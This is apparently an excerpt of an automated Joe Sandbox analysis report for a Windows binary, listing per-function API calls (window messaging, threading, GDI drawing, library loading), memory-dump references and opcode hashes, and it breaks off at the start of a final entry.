                                                                                                                                                                                                                                                                                                    Function 00E82374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00E82394
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E823A6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E823BC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E823D7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0e2ebeff496f1120bec3c39cd0d099b76339e42901cb3039c51aac63eb90cbbd
                                                                                                                                                                                                                                                                                                    • Instruction ID: 63c9bcba4e08aae666a73be47fd29b8cb8b5d0127e6773543c177fcf2bc84595
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e2ebeff496f1120bec3c39cd0d099b76339e42901cb3039c51aac63eb90cbbd
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D113C3A900219FFDB119B95CD85F9DBBB8FB08750F200095E604B7290D6716E10DB94
                                                                                                                                                                                                                                                                                                    Function 00E8EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00E8EB14
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00E8EB47
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E8EB5D
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E8EB64
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4451a0bb15b76fa5962f61e4aa0949b7dc0305d7b114c844cea3e1113aa6e72b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2890213ec91e2f02b9a856e2f068894a98da5d8a05ac2341f63a741196d3a199
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4451a0bb15b76fa5962f61e4aa0949b7dc0305d7b114c844cea3e1113aa6e72b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C112BB6904219BFC711ABA99C05A9F7FADAB45314F004259F919F3390E774C9088760
                                                                                                                                                                                                                                                                                                    Function 00E4D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00E4D369,00000000,00000004,00000000), ref: 00E4D588
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E4D594
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E4D59B
                                                                                                                                                                                                                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 00E4D5B9
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 84c7f5f74e28cf4e32ae4cae1651e1229ca91d3c6d9dc2d137ebc8c8fcb6858f
                                                                                                                                                                                                                                                                                                    • Instruction ID: a6b48e51a503ec5da18e1ab7d1d2012ed30adab16189b6d691ce0ff851b8bc99
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84c7f5f74e28cf4e32ae4cae1651e1229ca91d3c6d9dc2d137ebc8c8fcb6858f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D301D632409214BBCB106FA6FC09BAB7BA8EF81739F101319F925B61E0DF748804C6A1
                                                                                                                                                                                                                                                                                                    Function 00E27873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E278B1
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00E278C5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E278CF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6c43cd9cd50964e3e7fa4079bec492a0e00ca7540f2e051cc0b5f333686f6f15
                                                                                                                                                                                                                                                                                                    • Instruction ID: 921803cb8e057df17f5838f8a7f93081cdaeefeb429ed92ad2ba38b153c356dc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c43cd9cd50964e3e7fa4079bec492a0e00ca7540f2e051cc0b5f333686f6f15
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1811AD72505129BFDF0E5F94EC58EEBBB69FF483A8F041216FA0062120D7319C60EBA0
                                                                                                                                                                                                                                                                                                    Function 00E533E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00E5338D,00000364,00000000,00000000,00000000,?,00E535FE,00000006,FlsSetValue), ref: 00E53418
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00E5338D,00000364,00000000,00000000,00000000,?,00E535FE,00000006,FlsSetValue,00EC3260,FlsSetValue,00000000,00000364,?,00E531B9), ref: 00E53424
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E5338D,00000364,00000000,00000000,00000000,?,00E535FE,00000006,FlsSetValue,00EC3260,FlsSetValue,00000000), ref: 00E53432
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 521b62e91c1059c78e07bc936b73f6f510370c175bbea3c9d659dd0c7f1e325e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 825eb9b806495c4984707fb87a7872be42227033d02bea5d5b2c1b4fa51e9dba
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 521b62e91c1059c78e07bc936b73f6f510370c175bbea3c9d659dd0c7f1e325e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C801D4326152229FCB224B7A9C449977B98AF44BF6B200B34FE26F7180D731DD09C6E0
                                                                                                                                                                                                                                                                                                    Function 00E8BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E8B69A,?,00008000), ref: 00E8BA8B
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E8B69A,?,00008000), ref: 00E8BAB0
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E8B69A,?,00008000), ref: 00E8BABA
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E8B69A,?,00008000), ref: 00E8BAED
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c62607a79d287f298c4f797f562fde73ae5f355917e0192bebe4f8cc3bc453d7
                                                                                                                                                                                                                                                                                                    • Instruction ID: f852848f15937c0c6dbaf6c3eb56a9725c8052d60508808ca86e04066717ac88
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c62607a79d287f298c4f797f562fde73ae5f355917e0192bebe4f8cc3bc453d7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB117C74C05519DBCF08AFA9E9486EEBB78BF09711F101185D549B2240DB305654CB61
                                                                                                                                                                                                                                                                                                    Function 00EB886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00EB888E
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00EB88A6
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00EB88CA
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EB88E5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4f1775b8d6e3e63c72d52fbb3aa4651eb14a8d0f10450d27b3c41436cde11327
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8cd27e08a78f3b3c410394e073224cd63eb4b1cf4014c3ab6dbbe840598a71a3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f1775b8d6e3e63c72d52fbb3aa4651eb14a8d0f10450d27b3c41436cde11327
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E1140B9D04209AFDB41CFA9D884AEEBBB9FB08314F508166E915E2214E735AA54CF50
                                                                                                                                                                                                                                                                                                    Function 00E836F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E83712
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E83723
                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00E8372A
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E83731
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: cc957a18dd5f0287189fd334f64dbb2b15e23b6c96a7e328e840a27374a95314
                                                                                                                                                                                                                                                                                                    • Instruction ID: 246ef4e9154e662cf3fcaacb88090a5b91e3cf89beeae95d6500fe19bfe092cc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc957a18dd5f0287189fd334f64dbb2b15e23b6c96a7e328e840a27374a95314
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49E06DF11052247EDA2027A39C4DEEB7F6CDB42BA5F400116F10EF2090EAA1C944C2B0
                                                                                                                                                                                                                                                                                                    Function 00EB92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E21F87
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: SelectObject.GDI32(?,00000000), ref: 00E21F96
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: BeginPath.GDI32(?), ref: 00E21FAD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: SelectObject.GDI32(?,00000000), ref: 00E21FD6
                                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00EB92E3
                                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 00EB92F0
                                                                                                                                                                                                                                                                                                    • EndPath.GDI32(?), ref: 00EB9300
                                                                                                                                                                                                                                                                                                    • StrokePath.GDI32(?), ref: 00EB930E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 629d43f1e0ed0423fb01b9aa72ec8e74bff5abc1f756b3268e467270c8be3424
                                                                                                                                                                                                                                                                                                    • Instruction ID: b8c4d7a764df83ea25de53c80d2afd1cab8ebe0a9453881566bc9a1fc9ef92bc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 629d43f1e0ed0423fb01b9aa72ec8e74bff5abc1f756b3268e467270c8be3424
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF03A3200A269BBDB126F55AC0AFDB3AAAAF4A324F048100FB11710E2D7B55525DFA5
                                                                                                                                                                                                                                                                                                    Function 00E221A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 00E221BC
                                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00E221C6
                                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00E221D9
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00E221E1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 00cba81d7d379d3bbf256ba1cb0677ede63a129474a73097d24a7889166a9a1c
                                                                                                                                                                                                                                                                                                    • Instruction ID: c2da4141eb5aa13d9443ac4158c348d62d5d3582f3ce626174418f946ea2de7b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00cba81d7d379d3bbf256ba1cb0677ede63a129474a73097d24a7889166a9a1c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBE09B31245240BEDB215F79BC09BE93B51EB11339F048329F7F6740E0D77146449B10
                                                                                                                                                                                                                                                                                                    Function 00E7EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00E7EC36
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00E7EC40
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E7EC60
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?), ref: 00E7EC81
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 33a38e7389398f3f46bb508e70438a4e98b5e80839eead294a335a9b968e2c12
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0b1cd869bcd5eb7d421d9a1189e8c6ce2432e669f82d82f663a0a7a9157d20d0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33a38e7389398f3f46bb508e70438a4e98b5e80839eead294a335a9b968e2c12
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08E01AB4C08205DFCB41AFA1DD08A9EBBB1EB08310F108559E84AF3350D7385905EF10
                                                                                                                                                                                                                                                                                                    Function 00E7EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
